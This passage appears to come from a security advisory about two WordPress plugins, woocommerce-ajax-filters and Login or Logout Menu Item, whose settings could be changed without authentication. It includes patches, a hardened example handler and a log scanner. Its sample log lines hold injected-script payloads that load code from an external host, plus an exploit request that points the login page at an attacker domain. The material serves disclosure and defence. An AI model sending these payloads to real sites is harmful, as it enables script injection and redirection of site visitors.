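    '198.51.100.5 - type=attachment&width=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Ftop.worldctraffic.com%2Ftop%27%3E%3C%2Fscript%3E%3Cstyle%3E [23/Nov/2019:12:19:33 +0000] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"',
    "198.51.100.6 - action=savegooglecode&sgcgoogleanalytic=<script type=text/javascript src='data&colon;text&sol;javascript&comma;alert&lpar;1&rpar;'></script> \"POST /wp-admin/admin-ajax.php HTTP/1.1\"",
    '198.51.100.7 - action=fv_wp_flowplayer_email_signup&email=%3Csvg%2Fonload%3Deval%28String.fromCharCode%28104%2C116%2C116%2C112%2C115%29%29%3E%40test.com [08/Oct/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1"',
];

$lines = isset($argv[1]) ? file($argv[1], FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : SAMPLE_LINES;
foreach (scan_log($lines) as $n => $r) {
    printf("line %d from %s: %s\n", $n, $r['ip'], implode('; ', $r['hits']));
}
```

One practical caveat: the lines in these updates include the decoded POST body, which a stock Apache or nginx access log does not record. Without body logging (a WAF log, mod_security audit log, or an application-level request log) the scanner only sees the query string, which still covers the GET-based and `?page=...` variants above but not payloads carried purely in the body.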

Unauthenticated settings update in woocommerce-ajax-filters

woocommerce-ajax-filters, which currently has over 10,000 installations (versions <= 1.3.6), allows unauthenticated attackers to arbitrarily update all of the plugin's options and to redirect any user to an external malicious URL when the product section is visited. The bug stems from a misunderstanding of the admin_init hook’s execution context.

if( is_admin() ) {
      require_once dirname( __FILE__ ) . '/includes/wizard.php';
}
[...]

function wizard_selectors($wizard) {
[...]
 <div class="wizard_custom_js_css" style="display: none;">
    <h3><?php _e('User custom CSS style', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_custom_css]">
        <?php echo br_get_value_from_array($option, array('user_custom_css')) ?>
    </textarea>
    <h3><?php _e('JavaScript Before Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][before_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'before_update')) ?>
    </textarea>
    <h3><?php _e('JavaScript On Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][on_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'on_update')) ?>
    </textarea>
    <h3><?php _e('JavaScript After Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][after_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'after_update')) ?>
    </textarea>
</div>

[...]

What's the problem with the code above?

  • The developer assumed that WordPress’s admin_init hook is only fired when an administrator visits a page inside /wp-admin/.
  • The plugin settings allow users to add custom JavaScript code.

A patch was released a few days ago to address this vulnerability.

Because of the nature of the bug, specifically its severity, we will not be disclosing additional details. We are seeing malicious requests being used in the wild; while most of them target /wp-admin/admin-post.php, other endpoints in the /wp-admin/ directory can also be used to trigger the admin_init hook and exploit the vulnerability.

Malicious IPs attacking this plugin:

175.126.62.37
104.238.99.130
45.32.104.33
139.99.106.10
153.126.194.159
162.241.175.243
51.68.204.149
162.243.165.84
142.44.151.107
186.202.161.191
46.105.17.29
192.169.243.42
159.65.65.204
192.30.164.48
51.158.72.203
178.62.93.109
139.59.116.30
213.128.89.176
138.68.181.84

If you have an old version of this plugin installed please update to the latest version (1.3.7) asap. You can add a WAF as a second layer of protection and virtually patch the vulnerability.

Lack of controls when using WordPress’ update_option() with...

As mentioned in recent posts, WordPress’ update_option() function is used to update any option in the options database table. If developers do not implement the permission checks correctly when calling this function, attackers can gain admin access or inject arbitrary data into a site.

This is the case for the plugin Login or Logout Menu Item, which currently has over 10,000 installations (versions <= 1.1.1). This vulnerability allows unauthenticated attackers to arbitrarily update some plugin options and redirect any user to an external malicious URL.

function lolmi_save_settings() {
    if(isset($_POST['lolmi_settings_submit'])) {

        $login_page_url = (isset($_POST['lolmi_login_page_url']) && !empty($_POST['lolmi_login_page_url'])) ? $_POST['lolmi_login_page_url'] : wp_login_url();
        $login_redirect_url = (isset($_POST['lolmi_login_redirect_url']) && !empty($_POST['lolmi_login_redirect_url'])) ? $_POST['lolmi_login_redirect_url'] : home_url();
        $logout_redirect_url = (isset($_POST['lolmi_logout_redirect_url']) && !empty($_POST['lolmi_logout_redirect_url'])) ? $_POST['lolmi_logout_redirect_url'] : home_url();

        update_option('lolmi_login_page_url', esc_url_raw($login_page_url));
        update_option('lolmi_login_redirect_url', esc_url_raw($login_redirect_url));
        update_option('lolmi_logout_redirect_url', esc_url_raw($logout_redirect_url));

        [...]
    }
}

What's the problem with the function above?

  • It updates the option lolmi_login_page_url with any value provided by the user
  • It does not check the user’s capability
  • It does not check a nonce

A patch was released on August 5th, 2019 to address this vulnerability:

--Version: 1.1.1
++Version: 1.2.0
Plugin URI: https://caseproof.com

[…]
 ++ <?php wp_nonce_field('lolmi_nonce'); ?>
<input type="submit" id="lolmi_settings_submit" name="lolmi_settings_submit" value="<?php _e('Save Settings', 'lolmi'); ?>" class="button button-primary" />
</form>
[…]      
function lolmi_save_settings() {
 if(isset($_POST['lolmi_settings_submit'])) {
++if(!current_user_can('manage_options')) { die("Cheating eh?"); }
++check_admin_referer('lolmi_nonce');
[...]
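Review bot: the two added lines in `lolmi_save_settings()` close the unauthenticated path (`current_user_can('manage_options')` plus `check_admin_referer('lolmi_nonce')`, paired with the `wp_nonce_field('lolmi_nonce')` added to the form), but prefer `wp_die()` over `die("Cheating eh?")` so the refusal goes through WordPress’s normal error handling and status code; and since these options are later used as redirect targets, `esc_url_raw()` alone still stores any external URL, so run the values through `wp_validate_redirect( $url, home_url() )` (or otherwise restrict them to the site’s own host) unless off-site redirects are an intended feature.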

With just a few lines of code in the right place, developers can avoid security issues related to the misuse of this function and keep their users safe.
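The woocommerce-ajax-filters write-up above and the Login or Logout Menu Item patch just shown describe the same defect from two angles: a settings handler that runs for any request reaching /wp-admin/ and writes straight to update_option(). The block below is an added example written for this page, not code from either plugin; every hook, option and field name prefixed "example_" is an assumption for illustration. It shows the vulnerable shape beside a hardened handler that applies the three missing controls (proper hook, capability check, nonce check) and validates the values before storing them.

```php
<?php
// Added example (hypothetical plugin code, not BeRocket's or Caseproof's): a settings
// handler in the shape both write-ups above warn about, next to a hardened version.
// Hook, option and field names prefixed "example_" are assumptions for illustration.

// ---- Vulnerable pattern: admin_init fires for every request to a /wp-admin/ URL,
// ---- including admin-post.php and admin-ajax.php, logged in or not. is_admin()
// ---- only says the URL is in the admin area, nothing about who is asking.
add_action( 'admin_init', 'example_save_settings_unsafe' );
function example_save_settings_unsafe() {
    if ( isset( $_POST['example_settings_submit'] ) ) {
        // Anyone who can reach admin-post.php can rewrite these options.
        update_option( 'example_redirect_url', $_POST['example_redirect_url'] );
        update_option( 'example_custom_js', $_POST['example_custom_js'] );
    }
}

// ---- Hardened pattern ----
// 1. Register on admin_post_{action} only; without an admin_post_nopriv_ twin,
//    WordPress never routes an unauthenticated request to this handler.
add_action( 'admin_post_example_save_settings', 'example_save_settings_safe' );

function example_save_settings_safe() {
    // 2. Capability: may this user change site settings at all?
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to change these settings.', 'example' ), 403 );
    }
    // 3. Nonce: did the request come from our own settings form? (dies on failure)
    check_admin_referer( 'example_save_settings', 'example_nonce' );

    // 4. Validate before storing. The redirect target is kept on-site:
    //    wp_validate_redirect() returns the fallback for any foreign host.
    $redirect = isset( $_POST['example_redirect_url'] )
        ? esc_url_raw( wp_unslash( $_POST['example_redirect_url'] ) )
        : home_url();
    $redirect = wp_validate_redirect( $redirect, home_url() );

    // Custom JavaScript runs in every visitor's browser, so only users holding
    // unfiltered_html may set it (on multisite that excludes ordinary site admins).
    $custom_js = '';
    if ( current_user_can( 'unfiltered_html' ) && isset( $_POST['example_custom_js'] ) ) {
        $custom_js = wp_unslash( $_POST['example_custom_js'] );
    }

    update_option( 'example_redirect_url', $redirect );
    update_option( 'example_custom_js', $custom_js );

    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'options-general.php?page=example' ) ) );
    exit;
}
```

The matching form posts to admin_url( 'admin-post.php' ) with a hidden field named action set to example_save_settings and a wp_nonce_field( 'example_save_settings', 'example_nonce' ) call inside it. If a plugin must stay on admin_init (as the Login or Logout Menu Item patch does), the capability and nonce checks belong at the very top of the callback, before any $_POST value is read, exactly as that patch places them.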

These kinds of bugs are always the first choice for bad actors: they don’t need any authentication on the site, they are monetizable, and they are really easy to automate.

Here's how they are exploiting this particular bug in old versions of the plugin Login or Logout Menu Item:

192.169.157.142 - lolmi_settings_submit=1&lolmi_login_page_url=http[:]//gabriellalovecats[.]com/wp-login.php [0/Aug/2019] "POST /wp-admin/admin-post.php?action=lolmi_save_settings HTTP/1.1"